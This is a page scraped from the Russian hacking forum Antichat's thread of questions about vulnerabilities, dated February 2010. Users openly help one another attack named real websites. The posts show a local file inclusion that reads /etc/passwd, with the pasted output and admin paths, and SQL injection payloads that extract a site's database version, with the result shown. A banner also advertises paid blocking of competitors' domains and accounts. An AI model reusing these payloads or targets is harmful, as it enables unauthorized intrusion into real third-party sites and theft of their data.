Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1158 из 1393

1158

Опции темы

Поиск в этой теме

Опции просмотра

#11571

14.02.2010, 20:35

SeNaP

Участник форума

Регистрация: 07.08.2008

Сообщений: 281

Провел на форуме:
3300342

Репутация: 165

Всем привет, как можно узнать версию джумлы?

#11572

14.02.2010, 20:36

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

SeNaP, тебе сюда:

http://forum.antichat.ru/thread106899.html

#11573

14.02.2010, 20:39

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

Цитата:

+ в URL-кодировке - пробел.

можно еще 0x0a, 0x0c, 0x0b, 0x09 или любой символ неиспользуемый мускулом.

Цитата:

]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?

если версия => 5 то смотри в schema_name из таблицы schemata
UPD: немного неправильно понял, вообщем таким образом можно узнать полный список баз )

#11574

14.02.2010, 20:56

547

Участник форума

Регистрация: 11.10.2009

Сообщений: 116

Провел на форуме:
472147

Репутация: 211

у меня невыйшло проинклудить,может кто круче шарит и сможет расскрутить багу?

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/tmp/sess_5ulcekq6qo696vjsi4jn71ut57

#11575

14.02.2010, 21:11

HackUA

Познающий

Регистрация: 10.12.2009

Сообщений: 41

Провел на форуме:
1048786

Репутация: 5

Отправить сообщение для HackUA с помощью ICQ

Цитата:

Сообщение от 547

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/etc/passwd

root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0

perator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/:

#11576

14.02.2010, 21:14

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

Провел на форуме:
1777031

Репутация: 256

Отправить сообщение для CyberHunter с помощью ICQ

Вот помогите мне разобраться:

Цитата:

http://www.sukhoi.org/news/company/?id=3142

Как я понял, здесь отключены ошибки т.к. при вводе знак " ' ", не было ошибки.
Как можно здесь раскрутить скулю? Я пробивал перед "3142" ставить " - ", тогда страница изменилась.
Подскажите, что делать с этим сайтом?

#11577

14.02.2010, 21:24

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от 547

Код:

http://www.e-quilibres.net/pages/page.php?rub=gen&p=../adm/.htaccess&Id=185

http://www.e-quilibres.net/pages/page.php?rub=gen&p=/web/sites/vhbu/8/30/74216/public/www/.siteadmin&Id=185

http://www.e-quilibres.net/adm/

/web/sites/vhbu/8/30/74216/public/www/

#11578

14.02.2010, 21:29

auth_root

Новичок

Регистрация: 01.02.2010

Сообщений: 12

Провел на форуме:
52455

Репутация: 18

Помогите раскрутить

http://www.bre3zah.com/youtubes/admintest/videos/managevideos.php?x=20'

варнинги сыпет, но подобрать поля или обрезать запрос не получается...

#11579

14.02.2010, 21:31

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Код:

http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?

#11580

14.02.2010, 21:37

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Цитата:

Сообщение от Seravin

Код:

http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8,9,10,11+--+

Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?

Код:

http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)=5

http://www.pinskdrev.by/catalog.php?sub_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST((version()),14)d)+as+t+JOIN+(SELECT+NAME_CONST((version()),14)e)b)a)

5.0.32-Debian_7etch5-log

Страница 1158 из 1393

1158

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход